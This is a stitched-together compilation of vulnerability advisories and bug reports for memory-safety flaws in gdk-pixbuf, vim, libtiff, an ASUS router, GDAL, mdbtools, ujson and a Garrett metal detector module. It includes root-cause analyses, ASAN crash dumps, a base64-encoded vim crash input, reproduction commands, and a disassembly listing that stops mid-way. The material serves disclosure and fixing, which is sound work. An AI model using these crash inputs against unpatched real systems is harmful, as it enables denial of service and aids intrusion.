GNOME gdk-pixbuf 2.42.6 is vulnerable to a heap-buffer overflow vulnerability when decoding the lzw compressed stream of image data in GIF files with lzw minimum code size equals to 12.

**Summary**

The GdkPixbuf library is vulnerable to heap-buffer overflow vulnerability when decoding the lzw compressed stream of image data in GIF files with lzw minimum code size equals to 12.

**Technical Analysis**

When parsing the Image Data section of GIF files with lzw minimum code size equals to 12, the library miscalculates the maximum indexes the LZWDecoder->code_table can have, overwriting the LZWDecoder->code_table_size in _LZWDecoder structure.

In the following code snippets, we can observe that the LZW\_CODE\_MAX is set to 12 at line:28 in gdk-pixbuf/lzw.h which when left shifted at line:22 in gdk-pixbuf/lzw.c will yield MAX\_CODES value to 4096. This means that the LZW decoding operations ideally should always write to maximum 4096 indexes of LZWDecoder->code\_table.

file gdk-pixbif/lzw.h

    27:/* Maximum code size in bits */
    28:#define LZW_CODE_MAX 12

file: gdk-pixbuf/lzw.c

    21:/* Maximum number of codes */
    22:#define MAX_CODES (1 << LZW_CODE_MAX)
    23:
    24:typedef struct
    25:{
    26:        /* Last index this code represents */
    27:        guint8 index;
    28:
    29:        /* Codeword of previous index or the EOI code if doesn't extend */
    30:        guint16 extends;
    31:} LZWCode;
    32:
    33:struct _LZWDecoder
    34:{
    35:        GObject parent_instance;
    36:
    37:        /* Initial code size */
    38:        int min_code_size;
    39:
    40:        /* Current code size */
    41:        int code_size;
    42:
    43:        /* Code table and special codes */
    44:        int clear_code;
    45:        int eoi_code;
    46:        LZWCode code_table[MAX_CODES];
    47:        int code_table_size;
    48:
    49:        /* Current code being assembled */
    50:        int code;
    51:        int code_bits;
    52:
    53:        /* Last code processed */
    54:        int last_code;
    55:};

The following code snippets shows that the library first initializes the lzw_decoder object by calling lzw_decoder_new function wih the user controlled frame->lzw_code_size value at line:339 in gdk-pixbuf/io-gif-animation.c.

When the value of frame->lzw_code_size is set to 12 (0xc), the lzw_decoder_new gets called with the code\_size value equals to 13, which ultimately sets the value of self->eoi_code (end of information) to 4097 at line:131 in gdk-pixbuf/lzw.c, thus writing the values to overall 4098 indexes instead of predefined 4096 at line:133-137 in gdk-pixbuf/lzw.c.

file: gdk-pixbuf/io-gif-animation.c

    317:static void
    318:composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
    319:{
    320:        LZWDecoder *lzw_decoder = NULL;
    .
    .
    .
    338:
    339:        lzw_decoder = lzw_decoder_new (frame->lzw_code_size + 1);
    340:        index_buffer = g_new (guint8, frame->width * frame->height);

file: gdk-pixbuf/lzw.c

    118:LZWDecoder *
    119:lzw_decoder_new (guint8 code_size)
    120:{
    121:        LZWDecoder *self;
    122:        int i;
    123:
    124:        self = g_object_new (lzw_decoder_get_type (), NULL);
    125:
    126:        self->min_code_size = code_size;
    127:        self->code_size = code_size;
    128:
    129:        /* Add special clear and end of information codes */
    130:        self->clear_code = 1 << (code_size - 1);
    131:        self->eoi_code = self->clear_code + 1;
    132:
    133:        for (i = 0; i <= self->eoi_code; i++) {
    134:                self->code_table[i].index = i;
    135:                self->code_table[i].extends = self->eoi_code;
    136:                self->code_table_size++;
    137:        }
    138:
    139:        /* Start with an empty codeword following an implicit clear codeword */
    140:        self->code = 0;
    141:        self->last_code = self->clear_code;
    142:
    143:        return self;
    144:}

**Dynamic Analysis**

With the following gdb output, we can confirm that the lzw_decoder_new function writes to two more indexes than predefined 4096 indexes of LZWDecoder->code_table and thus overwrites the value of LZWDecoder->code_table_size from 4096 to 268505089.

    $43 = 4096
    $44 = (int *) 0x629000018228
    0x629000018228:	0x0000000000001000
    $45 = 4096
    
    Breakpoint 4, lzw_decoder_new (code_size=13 '\r') at ../gdk-pixbuf/lzw.c:134
    134	                self->code_table[i].index = i;
    (gdb) c
    Continuing.
    $46 = 4097
    $47 = (int *) 0x629000018228
    0x629000018228:	0x0000000010011001
    $48 = 268505089
    
    Breakpoint 4, lzw_decoder_new (code_size=13 '\r') at ../gdk-pixbuf/lzw.c:134
    134	                self->code_table[i].index = i;
    (gdb) c
    Continuing.
    $49 = 4098
    $50 = (int *) 0x629000018228
    0x629000018228:	0x1001000110011002
    $51 = 268505090
    
    Breakpoint 7, lzw_decoder_new (code_size=13 '\r') at ../gdk-pixbuf/lzw.c:140
    140	        self->code = 0;

**Steps to reproduce**

1.  Compile the gdk-pixbuf with address sanitizer.
2.  Execute the gdk-pixbuf/gdk-pixbuf-pixdata binary with the accompanied heap-buffer-overflow.gif file as follows and observed the ASAN dump:

command:

    ./gdk-pixbuf/gdk-pixbuf-pixdata ../../gdk-pixbuf/poc/heap_buffer_overflow.gif /tmp/bbbb

ASAN Dump:

    ==5565==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62900001336a at pc 0x00000053b142 bp 0x7fffc5dd1200 sp 0x7fffc5dd11f8
    READ of size 2 at 0x62900001336a thread T0
        #0 0x53b141 in write_indexes /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/lzw.c:88:36
        #1 0x53a8d9 in lzw_decoder_feed /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/lzw.c:212:46
        #2 0x5374c1 in composite_frame /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif-animation.c:364:21
        #3 0x5351ed in gdk_pixbuf_gif_anim_iter_get_pixbuf /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif-animation.c:421:17
        #4 0x5347bf in gdk_pixbuf_gif_anim_get_static_image /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif-animation.c:117:16
        #5 0x58e217 in gdk_pixbuf_animation_get_static_image /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-animation.c:586:16
        #6 0x532d08 in gif_get_lzw /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif.c:522:24
        #7 0x52caf7 in gif_main_loop /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif.c:821:13
        #8 0x52b370 in gdk_pixbuf__gif_image_load_increment /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-gif.c:1013:11
        #9 0x503404 in gdk_pixbuf_loader_load_module /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-loader.c:467:16
        #10 0x502127 in gdk_pixbuf_loader_close /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-loader.c:835:25
        #11 0x581dbb in gdk_pixbuf__qtif_image_load /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/io-qtif.c:217:21
        #12 0x4f47ec in _gdk_pixbuf_generic_image_load /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-io.c:1064:26
        #13 0x4f502b in gdk_pixbuf_new_from_file /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-io.c:1135:18
        #14 0x4efee7 in main /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/gdk-pixbuf-pixdata.c:77:12
        #15 0x7fe6f0e7582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #16 0x41e518 in _start (/root/gdk-pixbuf-poc/_build/gdk-pixbuf/gdk-pixbuf-pixdata+0x41e518)
    
    0x62900001336a is located 306 bytes to the right of 16440-byte region [0x62900000f200,0x629000013238)
    allocated by thread T0 here:
        #0 0x4be648 in malloc (/root/gdk-pixbuf-poc/_build/gdk-pixbuf/gdk-pixbuf-pixdata+0x4be648)
        #1 0x7fe6f297e7b8 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f7b8)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/gdk-pixbuf-poc/_build/../gdk-pixbuf/lzw.c:88:36 in write_indexes
    Shadow bytes around the buggy address:
      0x0c527fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c527fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c527fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c527fffa640: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
      0x0c527fffa650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c527fffa660: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa
      0x0c527fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa6a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c527fffa6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==5565==ABORTING

**Credits**

sahil.dhar@darkmatter.ae (xen1thlabs)

**POC File**

CVE-2021-44648: (CVE-2021-44648) GdkPixbuf Heap Buffer Overflow in lzw_decoder_new (#136) · Issues · GNOME / gdk-pixbuf · GitLab

vim is vulnerable to Heap-based Buffer Overflow

**Description**

A Heap-based Buffer Overflow has been found in vim commit 2f0936c

**Proof of Concept**

    base64 poc
    ZGVmIEZpcnN0RnVuY3Rpb24oKQogIGRlZiBTZWNvbmRGdW5vbmUKJCAgCiAgIGVuZGRCQkJCCmVu
    ZGRlZgojIEN/////bGUgYWxsZWZ8QkJCQgplbmRkZWYKIyBDb21waWxlIGFsbCBmdW5jdGlvbnMK
    ZGVmY29tcGlsZQo=
    

    ~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
    

ASan stack trace:

    ~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
    =================================================================
    ==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
    READ of size 5 at 0x60200000622f thread T0
        #0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
        #1 0xc444a6  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xc444a6)
        #2 0xf7515a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf7515a)
        #3 0xe1ba91  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe1ba91)
        #4 0xe14ca4  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14ca4)
        #5 0xe14009  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14009)
        #6 0xe12ddf  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12ddf)
        #7 0xe12043  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12043)
        #8 0xe0e863  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0e863)
        #9 0xe0ffaa  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0ffaa)
        #10 0xdaf709  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdaf709)
        #11 0xdc68ed  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdc68ed)
        #12 0xd92167  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xd92167)
        #13 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
        #14 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
        #15 0xb6680a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6680a)
        #16 0xb6457f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6457f)
        #17 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
        #18 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
        #19 0xf60f43  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf60f43)
        #20 0xf5d76f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf5d76f)
        #21 0x7f0d3f15a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #22 0x41dacd  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x41dacd)
    
    0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
    allocated by thread T0 here:
        #0 0x49620d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49620d)
        #1 0x4c5d15  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d15)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
    Shadow bytes around the buggy address:
      0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c00: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 06 fa
      0x0c047fff8c10: fa fa 00 01 fa fa fd fd fa fa fd fd fa fa 04 fa
      0x0c047fff8c20: fa fa 00 04 fa fa fd fd fa fa 00 03 fa fa fd fd
      0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
    =>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
      0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==836524==ABORTING

CVE-2022-0158: Heap-based Buffer Overflow in vim

LibTIFF 4.3.0 has an out-of-bounds read in _TIFFmemcpy in tif_unix.c in certain situations involving a custom tag and 0x0200 as the second word of the DE field.

Skip to content

Open Issue created Jan 04, 2022 by **4ugustus@waugustus**Contributor

**tiffset: Global-buffer-overflow in \_TIFFmemcpy, tif\_unix.c:346**

Summary

There is a global buffer overflow in \_TIFFmemcpy in libtiff/tif\_unix.c:346. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted tiff file.

Version

LIBTIFF, Version 4.3.0, commit id cd57b554 (Wed Dec 29 18:43:34 2021 +0000)

Steps to reproduce

    # ./build_asan/bin/tiffset -s 93 helloworld ./poc
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 2 (0x2) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 0 (0x0) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65280 (0xff00) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 250 (0xfa) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 9 (0x9) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 15 (0xf) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65535 (0xffff) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 23901 (0x5d5d) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 93 (0x5d) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 58624 (0xe500) encountered.
    TIFFReadDirectory: Warning, Ignoring TransferFunction since BitsPerSample tag not found.
    TIFFReadDirectory: Warning, Invalid data type for tag StripByteCounts.
    TIFFReadDirectory: Warning, Invalid data type for tag TileOffsets.
    TIFFFetchStripThing: Warning, Incorrect count for "TileOffsets"; tag ignored.
    TIFFReadDirectory: Warning, Wrong "StripByteCounts" field, ignoring and calculating from imagelength.
    =================================================================
    ==62478==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000004030e7 at pc 0x7f851f5cb935 bp 0x7fff7a6c4d30 sp 0x7fff7a6c44d8
    READ of size 2053925041 at 0x0000004030e7 thread T0
        #0 0x7f851f5cb934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
        #1 0x7f851f2dd249 in _TIFFmemcpy /root/test4/libtiff/libtiff/tif_unix.c:346
        #2 0x7f851f1e398c in setByteArray /root/test4/libtiff/libtiff/tif_dir.c:54
        #3 0x7f851f1eaa9f in _TIFFVSetField /root/test4/libtiff/libtiff/tif_dir.c:592
        #4 0x7f851f1ed75d in TIFFVSetField /root/test4/libtiff/libtiff/tif_dir.c:890
        #5 0x7f851f1ed18d in TIFFSetField /root/test4/libtiff/libtiff/tif_dir.c:834
        #6 0x401ab0 in main /root/test4/libtiff/tools/tiffset.c:149
        #7 0x7f851ee0683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
        #8 0x4012e8 in _start (/root/test4/libtiff/build_asan/bin/tiffset+0x4012e8)
    
    0x0000004030e7 is located 57 bytes to the left of global variable '*.LC0' defined in 'tiffset.c' (0x403120) of size 5
      '*.LC0' is ascii string '%s
    
    '
    0x0000004030e7 is located 0 bytes to the right of global variable 'usageMsg' defined in 'tiffset.c:49:19' (0x402f80) of size 359
      'usageMsg' is ascii string 'Set the value of a TIFF header to a specified value
    
    usage: tiffset [options] filename
    where options are:
     -s  <tagname> [count] <value>...   set the tag value
     -u  <tagname> to unset the tag
     -d  <dirno> set the directory
     -sd <diroff> set the subdirectory
     -sf <tagname> <filename>  read the tag value from file (for ASCII tags only)
     -h  this help screen
    '
    SUMMARY: AddressSanitizer: global-buffer-overflow ??:0 __asan_memcpy
    Shadow bytes around the buggy address:
      0x0000800785c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800785d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800785e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800785f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x000080078600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x000080078610: 00 00 00 00 00 00 00 00 00 00 00 00[07]f9 f9 f9
      0x000080078620: f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
      0x000080078630: 04 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9
      0x000080078640: 03 f9 f9 f9 f9 f9 f9 f9 00 00 00 04 f9 f9 f9 f9
      0x000080078650: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9
      0x000080078660: 03 f9 f9 f9 f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==62478==ABORTING

Platform

    # uname -a 
    Linux 37d1a8efe7bb 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:27:15 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

POC File

tiffset\_poc

CVE-2022-22844: tiffset: Global-buffer-overflow in _TIFFmemcpy, tif_unix.c:346 (#355) · Issues · libtiff / libtiff · GitLab

ASUS RT-AX56U Wi-Fi Router is vulnerable to stack-based buffer overflow due to improper validation for httpd parameter length. An authenticated local area network attacker can launch arbitrary code execution to control the system or disrupt service.

:::

*   勒索軟體防護專區
*   遠距辦公資安專區
*   回首頁
*   網站導覽
*   訂閱電子報
*   English

****

*   資安通報
*   Wannacry
*   駭客
*   勒索
*   手機

*   新聞公告News
    *   公告事項
    *   資安新聞
    *   資安活動
    *   電子報
*   資安服務Services
    *   資安通報
        *   一般資安通報
    *   資安聯盟
        *   資安聯盟簡介
        *   規章及會員申請暨異動申請
    *   台灣漏洞揭露平台 (TVN)
        *   TVN (Taiwan Vulnerability Note) 漏洞公告
        *   漏洞揭露政策
        *   漏洞通報
    *   惡意檔案檢測服務 (Virus Check)
    *   網路釣魚通報 (Phishing Check)
        *   網路釣魚通報
        *   釣魚網站列表
*   資安宣導Advocacy
    *   勒索軟體威脅防護專區
    *   遠距辦公資安專區
    *   企業資安事件應變處理指南
    *   威脅分析報告
    *   資安小知識
    *   資訊安全宣導
    *   資安宣導影音
    *   公開文件
*   相關網站Links
    *   國內資安組織
    *   國際資安組織
    *   網路資源
*   關於我們About us
    *   中心簡介
    *   活動紀事
        *   歷年年會活動網站
        *   活動花絮
    *   PGP KEY
    *   聯絡我們
    *   合作夥伴

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202112001

CVE ID

CVE-2021-44158

CVSS

8.0 (High)  
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

ASUS RT-AX56U firmware version 3.0.0.4.386.44266

問題描述

ASUS RT-AX56U無線路由器httpd配置未作參數長度驗證，導致Stack-based buffer overflow漏洞，使位於區域網路內的攻擊者以一般使用者權限登入後，即可執行任意程式碼，對系統進行任意操作或中斷服務。

解決方法

ASUS RT-AX56U firmware update version to 3.0.0.4.386.45898

漏洞通報者

Jixing Wang

公開日期

2022-01-03

CVE-2021-44158: ASUS RT-AX56U Router - Stack-based buffer overflow

GDAL 3.3.0 through 3.4.0 has a heap-based buffer overflow in PCIDSK::CPCIDSKFile::ReadFromFile (called from PCIDSK::CPCIDSKSegment::ReadFromFile and PCIDSK::CPCIDSKBinarySegment::CPCIDSKBinarySegment).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-45943: PCIDSK: fix write heap-buffer-overflow. Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=41993 by rouault · Pull Request #4944 · OSGeo/gdal

OpenEXR 3.1.x before 3.1.4 has a heap-based buffer overflow in Imf_3_1::LineCompositeTask::execute (called from IlmThread_3_1::NullThreadPoolProvider::addTask and IlmThread_3_1::ThreadPool::addGlobalTask). NOTE: db217f2 may be inapplicable.

CVE-2021-45942

MDB Tools (aka mdbtools) 0.9.2 has a stack-based buffer overflow (at 0x7ffd6e029ee0) in mdb_numeric_to_string (called from mdb_xfer_bound_data and _mdb_attempt_bind).

@@ -1,45 +1,28 @@ Version 0.9.3, Beta 4 \=============  
libmdb: \* Fix build failure with emscripten #299  
Version 0.9.3, Beta 3 \=============  
libmdb / libmdbsql: \* Fix build when \_XOPEN\_SOURCE was already defined on the platform #298  
Version 0.9.3, Beta 2 \=============  
libmdb: \* Migrate to g\_memdup2 #287 #288  
libmdbsql: \* Allow double quoted (") database names #291 \* Allow spaces in database names #292 #293  
Docs: \* Add JET version for access 2013/2016/2019 to docs #286  
Version 0.9.3, Beta 1 Version 0.9.3 \=============  
libmdb: \* Support files created with Access 2019 #260 #277 \* Fix a warning when reading in binary property values #262 \* Fix signed-unsigned comparison warning #269 \* Migrate to \`g\_memdup2\` #287 #288 \* Fix build when \`\_XOPEN\_SOURCE\` was already defined on the platform #298 \* Fix build failure with emscripten #299  
libmdbsql: \* Support negative floating point literals #274 #279 \* Comparison operators behaved incorrectly when the constant was on the left #283 #285 \* Improved support for file paths in \`CONNECT TO\` statements #275 #280 #282 \* Comparison operators behaved incorrectly when the constant was on the left #283 #285 \* Allow double quoted (") database names #291 \* Allow spaces in database names #292 #293  
ODBC: \* unixODBC now uses the \`--libdir\` passed at configure-time #261 \* Fix a segfault in PyODBC when \`SQLGetTypeInfo\` is called on an unsupported data type #278  
Docs: \* Add JET version for access 2013/2016/2019 to docs #286  
Version 0.9.2 \=============

CVE-2021-45927: Version 0.9.3, final · mdbtools/mdbtools@373b7ff

UltraJSON (aka ujson) through 5.1.0 has a stack-based buffer overflow in Buffer_AppendIndentUnchecked (called from encode). Exploitation can, for example, use a large amount of indentation.

id: OSV-2021-955

summary: Stack-buffer-overflow in Buffer\_AppendIndentUnchecked

details: |

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36009

\`\`\`

Crash type: Stack-buffer-overflow WRITE 1

Crash state:

Buffer\_AppendIndentUnchecked

encode

encode

\`\`\`

modified: '2022-05-19T00:45:08.957102Z'

published: '2021-07-11T00:01:05.153778Z'

references:

\- type: REPORT

url: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36009

affected:

\- package:

name: ujson

ecosystem: PyPI

ranges:

\- type: GIT

repo: https://github.com/ultrajson/ultrajson.git

events:

\- introduced: 0c52200eb4e2d97e548a765d5f089858c41967b0

\- fixed: f6860f1f3d8d4e92b9be0e5815355a8976c6e75b

\- fixed: 5525f8c9ef8bb879dadd0eb942d524827d1b0362

versions:

\- 2.0.0

\- 2.0.1

\- 2.0.2

\- 2.0.3

\- 3.0.0

\- 3.1.0

\- 3.2.0

\- 4.0.0

\- 4.0.1

\- 4.0.2

\- 4.1.0

\- 4.2.0

\- 4.3.0

\- 5.0.0

\- 5.1.0

\- v1.34

\- v1.35

ecosystem\_specific:

severity: HIGH

CVE-2021-45958: oss-fuzz-vulns/OSV-2021-955.yaml at main · google/oss-fuzz-vulns

Open Asset Import Library (aka assimp) 5.1.0 and 5.1.1 has a heap-based buffer overflow in _m3d_safestr (called from m3d_load and Assimp::M3DWrapper::M3DWrapper).

CVE-2021-45948

A stack-based buffer overflow vulnerability exists in the CMA check_udp_crc function of Garrett Metal Detectors’ iC Module CMA Version 5.0. A specially-crafted packet can lead to a stack-based buffer overflow during a call to memcpy. An attacker can send a malicious packet to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in the CMA check\_udp\_crc function of Garrett Metal Detectors’ iC Module CMA Version 5.0. A specially-crafted packet can lead to a stack-based buffer overflow during a call to memcpy. An attacker can send a malicious packet to trigger this vulnerability.

**Tested Versions**

Garrett Metal Detectors iC Module CMA Version 5.0

**Product URLs**

https://garrett.com/security/walk-through/accessories

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**Details**

The Garrett iC Module provides network connectivity to either the Garrett PD 6500i or Garrett MZ 6100 models of walk-through metal detectors. This module enables a remote user to monitor statistics such as alarm and visitor counts in real time as well as make configuration changes to metal detectors.

The Garrett iC Module exposes a discovery service on UDP port 6877. The “CMA Connect” software, used to interact with the iC modules from a remote system, can broadcast a particularly formatted UDP packet onto the network and iC modules that receive this packet will reply with various descriptors such as MAC address, serial number, and location. A function call to memcpy within the CRC validation logic of these UDP packets is vulnerable to a stack-based buffer overflow.

This buffer overflow occurs due to a mismatch in maximum buffer sizes between the function responsible for handling incoming UDP packets, udp_thread, and the function responsible for validating the message’s checksum, check_udp_crc. When a UDP message is received inside of udp_thread, a msghdr struct is populated with an iovec struct whose message attribute points to a 512-byte long character array called msgbuf.

    .text:0001D730                 SUB     R3, R11, #-msgbuf                        [1] uint8_t msgbuf[512]
    .text:0001D734                 MOV     R0, R3          ; s
    .text:0001D738                 MOV     R1, #0          ; c
    .text:0001D73C                 MOV     R2, #0x200      ; n
    .text:0001D740                 BL      memset                                   [2] memset(msgbuf, 0, 512)
    .text:0001D744                 SUB     R3, R11, #-msgbuf
    .text:0001D748                 STR     R3, [R11,#iov]                           [3] iov[0].iov_base = msgbuf
    .text:0001D74C                 MOV     R3, #0x200 
    .text:0001D750                 STR     R3, [R11,#iov.iov_len]                   [4] iov[0].iov_len = 512
    .text:0001D754                 SUB     R3, R11, #-(src_addr.__ss_padding+4)
    .text:0001D758                 SUB     R3, R3, #0xC
    .text:0001D75C                 STR     R3, [R11,#message]
    .text:0001D760                 MOV     R3, #0x80
    .text:0001D764                 STR     R3, [R11,#message.msg_namelen]
    .text:0001D768                 SUB     R3, R11, #-iov                      
    .text:0001D76C                 STR     R3, [R11,#message.msg_iov]               [5] message.msg_iov = iov
    .text:0001D770                 MOV     R3, #1
    .text:0001D774                 STR     R3, [R11,#message.msg_iovlen]            [6] message.msg_iovlen = 1
    .text:0001D778                 SUB     R3, R11, #-(cmbuf+0xC)
    .text:0001D77C                 SUB     R3, R3, #0xC
    .text:0001D780                 STR     R3, [R11,#message.msg_control]
    .text:0001D784                 MOV     R3, #0x100
    .text:0001D788                 STR     R3, [R11,#message.msg_controllen]
    .text:0001D78C                 SUB     R3, R11, #-message
